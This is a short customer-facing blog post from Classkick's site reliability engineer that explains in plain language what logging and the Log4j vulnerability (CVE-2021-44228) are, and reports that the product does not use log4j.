Classkick and the Log4j Vulnerability (CVE-2021–44228)
Hello!
Let’s get the thing you are most likely here for out of the way first:
Classkick does not use log4j, and is not vulnerable to CVE-2021–44228.
If that’s all you needed to know, there’s no need to read further. However, if you’re curious about what log4j is, and why it’s suddenly in the news, keep on reading!
What is log4j and Why is it Being Talked About so Much Lately?
Have you ever been out somewhere and saw someone like a security guard keep a list of things that happened in a book? Stuff like “3:40am, Lights in hallway turned on” or “11:00pm, Third shift began.” They use that to keep track of what happened. Since no human can (or should!) work 24 hours a day, it’s useful to share information on what happened with other people. Sometimes it’s a big help to figure out what’s going on, or if something is wrong.
Programmers do that too!
When we’re writing code we’ll tell the computer to keep a log of what’s going on, just like how a security guard might. Most of the time we tell the computer to create a file with this information in it (called a “log file”). In that log will be things like “User April logged in” or “Unable to talk to the database.” That file is very helpful for figuring out what went wrong when we’re trying to fix something that’s broken.
Since computers do a lot of things at once, it’s very handy to include extra information in the log file for each entry. Things like the exact time that it occurred, and what part of the program was running at the time. That’s where libraries like log4j come in! Computers are good at doing boring things like looking up what time it is, so programmers tell the computer to do that part, which lets them focus on the fun things (like adding cool features to Classkick!).
A programmer can tell the computer to record something like “User April logged in,” and the computer will turn that into “[2012–12–15 09:37:29] [com.classkick.sayHello:23] User April logged in.” (Look close! From left to right it’s the time it happened, the file and line of code where the message was logged from, and the message itself! Very handy for figuring out what was going on.)
So What’s the Big Deal About log4j?
log4j is a logging library that a lot of programmers use. It does its job well, so it’s in use in a lot of places. The problem is, some clever people discovered that it does extra processing on the log messages that wasn’t intended, and figured out how to use that to do bad things.
Let’s suppose I knew that the computer would log something like “Login failure for April,” and I knew that “April” came from the login screen on the website. I could then type “EvilApril” into the login screen and the computer would log “Login failure for EvilApril.” Normally that’s fine, and that’s what we want to happen, right? But what if I put something like “https://classkick.com” into the login screen instead, and the computer tried to load our website as it was writing it to the file? That’s not what the programmer wanted, but the library is doing it, and that’s why log4j is suddenly in the news. The bug gave people a way to make someone else’s computer do a thing that the programmer didn’t intend for it to do!
How Did We Make Sure Classkick is Safe From this Bug?
There are lots of logging libraries available to use, and we use one that’s not vulnerable to the bug in CVE-2021–44228. We did an audit on December 10th, 2021 just to make sure that log4j wasn’t in use in our systems, and we discovered it isn’t.
The security of your classroom is really important to us! We will keep on monitoring the latest developments in this issue and will respond to any new threats immediately if needed.
April White
Site Reliability Engineer
